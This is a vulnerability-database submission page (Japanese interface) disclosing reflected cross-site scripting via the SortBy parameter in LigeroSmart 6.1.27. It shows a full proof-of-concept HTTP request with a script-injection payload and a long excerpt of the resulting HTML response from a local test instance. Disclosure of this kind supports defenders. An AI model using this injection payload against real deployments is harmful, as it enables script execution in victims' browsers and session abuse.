| タイトル | LigeroSmart LigeroSmart (OTRS-based platform) 6.1.27 Cross-Site Scripting (XSS) - Reflected XSS |
|---|
| 説明 | LigeroSmart Service Desk v6.1.27 is vulnerable to reflected XSS via the `SortBy` parameter
The vulnerability occurs due to improper input validation and output encoding of the `SortBy` parameter in requests sent to `/otrs/index.pl`. An authenticated attacker can inject arbitrary JavaScript code via this parameter, which is reflected in the HTTP response and executed in the context of the victim’s browser.
Docker was installed and tests were performed.
https://github.com/LigeroSmart/docker-ligerosmart
REQUEST
POST /otrs/index.pl HTTP/1.1
Host: localhost:9090
Content-Length: 46
sec-ch-ua-platform: "Windows"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:9090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9090/otrs/index.pl?
Accept-Encoding: gzip, deflate, br
Cookie: OTRSAgentInterface=mGvYIUIyihthTyFtxMhNihGuC3BGLRnw
Connection: keep-alive
;SortBy='"()%26%25<ScRiPt>alert(7777)</ScRiPt>
RESPONSE
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Disposition: filename="AgentDashboard.html"
Content-Type: text/html; charset=utf-8;
Date: Sat, 31 Jan 2026 13:21:19 GMT
Expires: Tue, 1 Jan 1980 12:00:00 GMT
Pragma: no-cache
Server: nginx
X-Frame-Options: SAMEORIGIN
X-Ua-Compatible: IE=edge,chrome=1
Content-Length: 99734
<!DOCTYPE html>
<html>
<!-- -->
<!-- OTRS: Copyright (C) 2001-2020 OTRS AG, https://otrs.com/. -->
<!-- Web: https://otrs.com/ - Lists: https://lists.otrs.org/ -->
<!-- GNU General Public License: https://www.gnu.org/licenses/gpl-3.0.txt -->
<!-- -->
<head>
<meta http-equiv="Content-type" content="text/html;charset=utf-8" />
<meta id="viewport" name="viewport" content="">
<meta name="robots" content="noindex,nofollow" />
<script>
(function(doc, win) {
var viewport = doc.getElementById('viewport'),
isIFrame = (win.top.location.href !== win.location.href),
isPopup = (win.name.search(/^OTRSPopup_/) != -1);
try {
if (((!isIFrame && !isPopup) || (isIFrame && isPopup)) && (!localStorage.getItem("DesktopMode") || parseInt(localStorage.getItem("DesktopMode"), 10) <= 0)) {
viewport.setAttribute("content", "width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no");
}
}
catch (Exception) {}
}(document, window));
</script>
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (Ticket#)" href="/otrs/index.pl?Action=AgentTicketSearch;Subaction=OpenSearchDescriptionTicketNumber" />
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (Texto Completo)" href="/otrs/index.pl?Action=AgentTicketSearch;Subaction=OpenSearchDescriptionFulltext" />
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (FAQ#)" href="/otrs/index.pl?Action=AgentFAQSearch;Subaction=OpenSearchDescriptionFAQNumber" />
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (FAQ-TextoCompleto)" href="/otrs/index.pl?Action=AgentFAQSearch;Subaction=OpenSearchDescriptionFulltext" />
<link rel="shortcut icon" href="/otrs-web/skins/Agent/ligero/img/icons/product.ico" type="image/ico" />
<link rel="apple-touch-icon" href="/otrs-web/skins/Agent/ligero/img/icons/apple-touch-icon.png" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css-cache/CommonCSS_58d99bf049eab644adf1f2f6d94d8555.css" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/ligero/css-cache/CommonCSS_9ccfdcfb580d3c1055590bb9f234fef7.css" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css-cache/ModuleCSS_b0fcdb56932ab41797730e5b31c77fa7.css" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css/thirdparty/ui-theme/jquery-ui.css" />
<style type="text/css">
#Header #Logo {
background-image: url(/otrs-web/skins/Agent/default/img/logo_bg.png);
top: 7px;
right: 24px;
width: 300px;
height: 55px;
}
</style>
<link rel="stylesheet" type="text/css" href="/otrs-web/common/css/font-awesome.min.css" />
<script>
(function(doc, win) {
var isIFrame = (win.top.location.href !== win.location.href),
isPopup = (win.name.search(/^OTRSPopup_/) != -1);
try {
if (((!isIFrame && !isPopup) || (isIFrame && isPopup)) && (!localStorage.getItem("DesktopMode") || parseInt(localStorage.getItem("DesktopMode"), 10) <= 0)) {
var ResponsiveCSS;
ResponsiveCSS = doc.createElement("link");
ResponsiveCSS.setAttribute("rel", "stylesheet");
ResponsiveCSS.setAttribute("type", "text/css");
ResponsiveCSS.setAttribute("href", "/otrs-web/skins/Agent/default/css-cache/ResponsiveCSS_342832cd0dfa4f871e6b8d41435252e0.css");
doc.getElementsByTagName("head")[0].appendChild(ResponsiveCSS);
}
}
catch (Exception) {}
}(document, window));
</script>
<title>Painel - LigeroSmart</title>
<script type="text/javascript">//<![CDATA[
"use strict";
var Core = Core || {};
Core.App = Core.App || {};
/**
* @function
* Ignores an event. Implemented without jQuery because no external JavaScript is available yet.
* @return nothing
*/
function IgnoreEvent (Event) {
if (Event.preventDefault) {
Event.preventDefault();
}
Event.returnValue = false;
return false;
}
/**
* @function
* This function blocks all click events on the page until it is
* unblocked after all JavaScript was loaded. Implemented without
* jQuery because no external JavaScript is available yet.
* @return nothing
*/
Core.App.BlockEvents = function() {
if (document.addEventListener) {
document.addEventListener('click', IgnoreEvent, false);
}
else {
document.attachEvent('onclick', IgnoreEvent);
}
};
/**
* @function
* This function unblocks all click events on the page
* after all JavaScript was loaded. Implemented without
* jQuery because no external JavaScript is available yet.
* @return nothing
*/
Core.App.UnblockEvents = function() {
if (document.removeEventListener) {
document.removeEventListener('click', IgnoreEvent, false);
}
else {
document.detachEvent('onclick', IgnoreEvent);
}
// allow tests to wait for complete page load
Core.App.PageLoadComplete = true;
};
// Now block all click events on the page to make sure that
// an agent does not click before all JavaScript was loaded,
// as event listeners are not yet available, for example.
Core.App.BlockEvents();
//]]></script>
</head>
<body class="">
<a name="Top"></a>
<div id="AppWrapper">
<div id="Header" class="ARIARoleBanner">
<div id="Logo"></div>
<ul id="ToolBar">
<li class="UserAvatar">
<a href="#">
<img src="//www.gravatar.com/avatar/b1a4b2518dbbdd47dd4a713d5cd1df94?s=100&d=mp" />
</a>
<div>
<span>Admin LigeroSmart</span>
<a href="/otrs/index.pl?Action=AgentPreferences" title="Editar preferências pessoais">
<i class="fa fa-cog"></i><strong>Preferências Pessoais</strong>
</a>
<a class="LogoutButton" id="LogoutButton" href="/otrs/index.pl?Action=Logout;ChallengeToken=UFfwuDve1AuIS2ehbEmyWw4pZ2qVcCeE;" title="Sair (Você está logado como Admin LigeroSmart)">
<i class="fa fa-power-off"></i><strong>Sair</strong>
</a>
</div>
</li>
<li class="QueueView"><a href="/otrs/index.pl?Action=AgentTicketQueue" target="" accesskey="q" title="Visão de Filas: (q)">Visão de Filas <i class="icon-small fa fa-clock-o icon-show-reached"></i> <i class="icon-small fa fa-star icon-show-new"></i><i class="fa fa-folder"></i> <span class="Counter"></span> </a></li>
<li class="QueueView"><a href="/otrs/index.pl?Action=AgentTicketQueueKanban" target="" accesskey="q" title="Kanban view: (q)">Kanban view <i class="icon-small fa fa-clock-o icon-show-reached"></i> <i class="icon-small fa fa-star icon-show-new"></i><i class="fa fa-random"></i> <span class="Counter"></span> </a></li>
<li class="ComplementoView"><a href="/otrs/index.pl?Action=AgentTicketComplementoView" target="" accesskey="q" title="Complemento View: (q)">Complemento View <i class="icon-small fa fa-clock-o icon-show-reached"></i> <i class="icon-small fa fa-star icon-show-new"></i><i class="fa fa-filter"></i> <span class="Counter"></span> </a></li>
<li class="StatusView"><a href="/otrs/index.pl?Action=AgentTicketStatusView" target="" accesskey="" title="Visão de Estados: ">Visão de Estados <i class="icon-small fa fa-clock-o icon-show-reached"></i> <i class="icon-small fa fa-star icon-show-new"></i |
|---|
| ソース | ⚠️ https://github.com/LigeroSmart/ligerosmart/issues/283 |
|---|
| ユーザー | Samara Gama - igobysamy (UID 81801) |
|---|
| 送信 | 2026年01月31日 14:53 (3 月 ago) |
|---|
| モデレーション | 2026年02月15日 17:00 (15 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 346155 [LigeroSmart 迄 6.1.26 /otrs/index.pl SortBy クロスサイトスクリプティング] |
|---|
| ポイント | 20 |
|---|